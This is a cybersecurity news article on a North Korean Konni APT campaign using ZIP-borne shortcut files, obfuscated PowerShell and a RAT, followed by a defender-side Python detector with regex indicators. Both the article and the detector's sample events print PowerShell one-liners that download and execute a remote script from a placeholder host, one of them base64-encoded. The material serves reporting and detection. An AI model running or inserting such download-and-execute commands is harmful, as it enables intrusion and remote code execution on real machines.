Cyber Security News

Konni APT Hackers Using Multi-Stage Malware to Attack Organizations

A sophisticated multi-stage malware campaign linked to the North Korean Konni APT group has been detected targeting organizations primarily in South Korea.

Security researchers uncovered the operation on April 29, 2025, revealing a complex attack chain designed to establish persistent access and exfiltrate sensitive information from compromised systems.

The campaign demonstrates the continued evolution of Konni’s capabilities and their persistent focus on South Korean entities.

The attack begins with a seemingly innocuous ZIP file containing a disguised .lnk shortcut that, when executed, triggers an obfuscated PowerShell script.

This initial stage acts as the infection vector, connecting to command-and-control infrastructure to download and execute additional malicious payloads.

The multi-stage approach allows the attackers to maintain a low profile while establishing deeper access into targeted networks.

Broadcom analysts identified the final payload as a sophisticated Remote Access Trojan (RAT) specifically engineered to establish persistence, collect system information, harvest directory listings, and exfiltrate the gathered data to compromised command-and-control servers.

The researchers noted that this campaign represents a significant advancement in Konni’s technical capabilities compared to previous operations.

The timing and targets suggest possible intelligence-gathering motives, aligning with North Korea’s long-standing cyber espionage efforts against South Korean organizations.

Security experts warn that the campaign could expand to additional targets across the region if left unchecked.

Infection Mechanism Analysis

The infection chain begins when users interact with a weaponized ZIP archive containing what appears to be a legitimate document but is actually a malicious .lnk shortcut.

When executed, this shortcut launches PowerShell with heavily obfuscated commands designed to evade detection. A typical command structure might resemble:

powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command "$c='IEX (New-Object Net.WebClient).DownloadString(''http://compromised-server.com/payload.ps1'')'; iex $c"

This first-stage script performs system reconnaissance and establishes persistence through registry modifications or scheduled tasks before downloading the second-stage loader.

The loader then decrypts and deploys the final RAT payload, which communicates with the C2 server using encrypted channels to transmit stolen data.

Security products have identified numerous indicators associated with this campaign, including behavior-based detections like SONAR.Powershell!g20 and file-based detections such as Trojan.Gen.NPE.
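As an added defender-side example (not part of the article, and not code from Broadcom or any other vendor product), the following Python script scores process-creation events for the chain described above: PowerShell spawned from Explorer (the .lnk double-click), an ExecutionPolicy bypass, a hidden window, a remote DownloadString and Invoke-Expression, optionally hidden inside an -EncodedCommand argument that the script decodes before matching. The event format, indicator weights, alert threshold and sample log lines are all constructed for this example; the only value reused from the article is its illustrative placeholder URL.

```python
"""Score PowerShell process-creation events for the LNK -> obfuscated PowerShell
-> remote download pattern. Example code added to the article; the log format,
weights and sample events below are constructed, not real telemetry."""
import base64
import re
from typing import Dict, List, NamedTuple, Tuple

# Weighted indicators: (name, case-insensitive regex, weight). Patterns are run
# over the raw command line plus any decoded -EncodedCommand payload.
INDICATORS: List[Tuple[str, str, int]] = [
    ("exec_policy_bypass", r"-(?:ep|exec(?:utionpolicy)?)\s+bypass", 2),
    ("hidden_window",      r"-w(?:indowstyle)?\s+hidden", 2),
    ("remote_download",    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", 3),
    ("invoke_expression",  r"\biex\b|invoke-expression", 3),
    ("encoded_command",    r"-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", 2),
]
ALERT_THRESHOLD = 5  # constructed threshold: two strong indicators, or one plus context

POWERSHELL_IMAGES = ("powershell.exe", "pwsh.exe")


class Event(NamedTuple):
    """Minimal process-creation record (constructed schema)."""
    image: str
    parent: str
    command_line: str


def decode_encoded_command(command_line: str) -> str:
    """Return the UTF-16LE plaintext of an -EncodedCommand argument, or '' if absent/invalid."""
    m = re.search(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", command_line, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def score_event(ev: Event) -> Dict[str, object]:
    """Score one event; non-PowerShell images score 0 and never alert."""
    if ev.image.lower() not in POWERSHELL_IMAGES:
        return {"score": 0, "indicators": [], "alert": False}
    text = ev.command_line + " " + decode_encoded_command(ev.command_line)
    hits = [name for name, pat, _ in INDICATORS if re.search(pat, text, re.I)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    # A shortcut opened from a ZIP/Explorer window spawns PowerShell under explorer.exe.
    if ev.parent.lower() == "explorer.exe":
        hits.append("spawned_by_explorer")
        score += 1
    return {"score": score, "indicators": hits, "alert": score >= ALERT_THRESHOLD}


def scan(events: List[Event]) -> List[Tuple[Event, Dict[str, object]]]:
    """Return (event, result) pairs for every event that crosses the threshold."""
    results = [(ev, score_event(ev)) for ev in events]
    return [(ev, r) for ev, r in results if r["alert"]]


def _encoded(cmd: str) -> str:
    """Build an -EncodedCommand argument the way PowerShell expects (base64 of UTF-16LE)."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")


# Constructed sample events: two malicious-looking launches (one plain, one encoded),
# one benign scheduled script, one unrelated process.
SAMPLE_EVENTS = [
    Event("powershell.exe", "explorer.exe",
          "powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -Command "
          "\"$c='IEX (New-Object Net.WebClient).DownloadString(''http://compromised-server.com/payload.ps1'')'; iex $c\""),
    Event("powershell.exe", "explorer.exe",
          "powershell.exe -nop -w hidden -enc "
          + _encoded("IEX (New-Object Net.WebClient).DownloadString('http://compromised-server.com/stage2.ps1')")),
    Event("powershell.exe", "cmd.exe", "powershell.exe -File C:\\Scripts\\nightly-backup.ps1"),
    Event("notepad.exe", "explorer.exe", "notepad.exe C:\\Users\\alice\\notes.txt"),
]

if __name__ == "__main__":
    for ev, r in scan(SAMPLE_EVENTS):
        print(f"ALERT score={r['score']} parent={ev.parent} indicators={r['indicators']}")
        print(f"       {ev.command_line[:90]}...")
```

The decoding step matters because an operator can move every telltale token out of the visible command line by base64-encoding it; matching only the raw string would miss the second sample entirely. In production the same scoring can be expressed as a Sigma or EDR rule, with the benign-script case used to tune the threshold against local noise.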


Tushar Subhra Dutta

Tushar is a Cyber security content editor with a passion for creating captivating and informative content. With years of experience under his belt in Cyber Security, he is covering Cyber Security News, technology and other news.
